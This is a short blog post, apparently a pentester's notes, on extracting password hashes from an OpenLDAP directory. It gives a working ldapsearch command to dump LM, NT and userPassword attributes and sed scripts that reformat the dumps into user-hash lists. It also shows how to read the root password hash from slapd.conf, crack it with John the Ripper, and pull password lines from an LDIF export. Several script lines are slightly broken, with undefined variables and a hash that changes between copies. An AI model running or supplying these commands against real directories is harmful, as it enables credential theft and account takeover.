Wednesday, October 26, 2016

LDAP attributes for password extraction

 for ldap attribute extraction the following are key:  
 Filter: (objectClass=*)  
 Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword  
 i have access to an openldap server. yes!  
 the search DN is:  
 dc=my,dc=pants,dc=com  
   
 valid user accounts are kept:  
 ou=users,DN  
   
 retired user accounts are kept:  
 ou=yawn,DN  

 let's grab passwords...
  
 ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword /  
 -h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL /  
 -v "(objectClass=*)" sambaLMPassword > lmpassword
   
 i know that all valid accounts have this format:  
 dn: uid=username  
   
 some places have a different dn: than the valid logon id.  
 those can be simply the attribute uid=username  
   
 my script below is to slice and dice "dn: uid="  
   
 when doing the ldap dump, however, attributes may be juggled. more advanced  
 text sorting is required for proper formatting... i digress.  
  
   
 #!/bin/bash  
   
 dumporig=userpassword  
 dump=userpassword.sed  
   
 cp $lmorig $lm  
   
 cp $lmorig $lm  
 sed -i '/ou=groups/d' $dump                         <-- remove groups as dumped  
 sed -i '/sambaDomainName/d' $dump                   <-- there are no passes for me here  
 sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump               <-- admin has cn: as do others  
 sed -i '/^$/d' $dump                                <-- blank lines be gone  
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn  
 sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump  <-- removing dangling dn  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  <-- stripping dn  
 sed -i 's/,dc=my,dc=pants,dc=com//g' $dump          <-- removing dangling dn  
 sed -i '/dc=my/d' $dump                             <-- removing dangling dn  
 sed -i 's/dn:\ uid=//g' $dump                       <-- we only want uid  
 sed -i '/dn:\ /d' $dump                             <-- for records that only have leadinf dn:  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump               <-- fun with line breaks  
 sed -i 's/userPassword::/userPassword:/g' $dump     <-- converting attribite. some are :: others :  
 sed -i 's/userPassword//g' $dump                    <-- remove the strip altgother. once : remains  
 sed -i 's/blast:\ /:/g' $dump                       <-- fun  
 sed -i 's/blast/\n/g' $dump                         <-- convert fun to a new line  
 sed -i '/:/!d' $dump                                <-- no : ? go away  
 sed -i '/^:/d' $dump                                <-- start with : ? go away
 sed -i 's/=//g' $dump                               <-- remove trailing =  
 sort -u $dump > $dump.out                        <-- sort the output  
 rm $dump                                            <-- remove temp file  
   
for LMPassword it is a little simpler. NTPassword is the same; replace the LMPassword attribute for file processing.
 #!/bin/bash  
   
 dumporig=lmpassword  
 dump=lmpassword.sed  
   
 cp $dumporig $dump  
 sed -i '/ou=groups/d' $dump  
 sed -i '/sambaDomainName/d' $dump  
 sed -i '/dn:\ cn=/d' $dump  
 sed -i '/^$/d' $dump  
 sed -i '/^uid:\ /d' $dump                       <-- removing uid if we dumped it   
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  
 sed -i '/dc=my/d' $dump  
 sed -i 's/dn:\ uid=//g' $dump  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump  
 sed -i 's/sambaLMPassword//g' $dump  
 sed -i 's/blast:\ /:/g' $dump  
 sed -i 's/blast/\n/g' $dump  
 sed -i '/:/!d' $dump  
 sort -u $dump > $dump.out  
 rm $dump  
   
 but... what is rootdn's password for to access the openldap server?  
   
 it is found here:  
 /etc/ldap/slapd.conf  
   
 scroll down to:  
 rootdn  
   
 another account worth checking is replicator, but  
 it may be restricted to certain hosts.  
   
 rootdn "cn=admin,dc=my,dc=pants,dc=com"  
 moduleload syncprov.la  
 overlay syncprov  
 syncprov-checkpoint 100 10  
 syncprov-sessionlog 100  
 rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p  
   
 crack that password by placing the following in a text file, say slap.out:  
   
 rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p  
   
 /opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out  
   
 * note: --format=salted-sha1-opencl may barf:  
 Build log: ptxas error  : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)  
   
 it is only one password...  
    
however.
 if you are are able to grab an ldif, things are way easier.  
   
 sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out  
   
 this has you searching for the strings "dn:" and "Password" and printing their lines out in that  
 order to an output file.  
   
 easy. then you parse away.  
   
Post a Comment